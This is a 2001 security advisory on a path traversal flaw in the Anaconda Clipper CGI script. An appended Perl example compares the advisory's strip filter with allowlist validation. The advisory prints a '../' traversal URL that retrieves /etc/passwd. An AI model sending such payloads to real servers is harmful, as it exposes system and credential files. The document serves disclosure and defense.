---=== UkR security team - Advisory no. 11 ===---

Anaconda Clipper - 'arbitrary file retrieval' vulnerability

Date: 27.03.2001
Problem: input validation error.
Vulnerable products: Anaconda Clipper ver. 3.3 (probably others, but not tested)
Product vendor: Anaconda / http://www.anaconda.net

Comment:
'..' and '/' are not filtered while processing user input, so it is possible to
enter arbitrary values to retrieve files from the remote server which should not
normally be accessible (for example, /etc/passwd).

Workaround:
# this will help somewhat...
# remove '..' and '/' from the parameter; repeat until nothing is removed,
# so that stripping one match cannot leave a new '..' behind (e.g. './.' -> '..')
1 while $input =~ s{\.\.|/}{}g;

Author: UkR-XblP / UkR security team / http://www.ukrteam.ru

Example:
http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd

--------------------------------------------------------------------------------
UkR XblP
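The advisory's workaround strips '..' and '/' from the parameter, which only blacklists two patterns. The block below is an added example, not code from the advisory or from Anaconda Clipper: it puts that strip-until-stable filter beside an allowlist check that a Perl CGI script would use to confine a 'template' parameter to one directory. The template directory path and the parameter names are assumptions.

```perl
#!/usr/bin/perl
# Added example (not part of the UkR advisory or of Anaconda Clipper):
# two ways to guard a CGI 'template' parameter against '..' / '/' traversal.
use strict;
use warnings;
use File::Spec;

# Assumed location of the templates; the real Anaconda Clipper layout is not known here.
my $TEMPLATE_DIR = '/var/www/templates';

# Weak approach (the advisory's idea): remove '..' and '/' until nothing changes.
# A single pass is not enough, because removing '/' from './.' leaves '..' behind.
sub strip_traversal {
    my ($input) = @_;
    1 while $input =~ s{\.\.|/}{}g;
    return $input;
}

# Stronger approach: accept only a plain file name made of safe characters,
# refuse names that start with a dot (covers '.', '..' and dotfiles), and only
# then join it onto the template directory. Because '/' and '\' are never
# accepted, the result cannot leave $TEMPLATE_DIR.
sub safe_template_path {
    my ($name) = @_;
    return undef unless defined $name;
    return undef unless $name =~ /\A[A-Za-z0-9_.-]{1,64}\z/;   # allowlist
    return undef if $name =~ /\A\./;                           # no leading dot
    return File::Spec->catfile($TEMPLATE_DIR, $name);
}

# Demonstration with constructed parameter values.
if (!caller) {
    for my $t ('header.html', '../../../../etc/passwd', './.', 'a/../../b', '..') {
        my $safe = safe_template_path($t);
        printf "%-28s strip='%s'  allowlist=%s\n",
            "'$t'", strip_traversal($t), defined $safe ? $safe : 'rejected';
    }
}
```

In the demonstration, 'header.html' is the only value the allowlist accepts; the traversal strings are rejected outright, whereas strip_traversal reduces them to 'etcpasswd', '' and 'ab', which a script would still go on to open. Validating what is allowed, rather than deleting what is known to be bad, is the check a practitioner should keep.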